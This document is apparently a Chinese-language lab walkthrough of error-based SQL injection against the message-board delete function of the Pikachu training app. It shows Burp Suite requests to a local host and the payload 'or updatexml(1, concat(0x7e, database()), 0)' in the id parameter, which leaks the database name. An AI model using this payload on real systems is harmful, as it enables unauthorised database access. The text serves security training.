留言板输入几条信息
出现删除按钮,点他
通过burpsuite拦截请求,请求报文如下
GET /vul/sqli/sqli_del.php?id=57 HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1
推测id=57处可能存在注入点,发送给repeater;并修改报文
57后面加一个',点击send,返回报文果然印证了猜测
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
那么这里就是一个注入点
57 后面加一段
or updatexml(1, concat(0x7e, database()), 0)
右键选中id对应的value,选择Convert selection ,选择url ,选择 Url-encode key character; 将选中的文字urlencode
GET /vul/sqli/sqli_del.php?id=57+or+updatexml(1,+concat(0x7e,+database()),+0) HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1
可以看出空格都替换成了+
点击发送后,同样的(也是利用Xpath不认识~的原理)爆出了数据库名称
XPATH syntax error: '~pikachu'
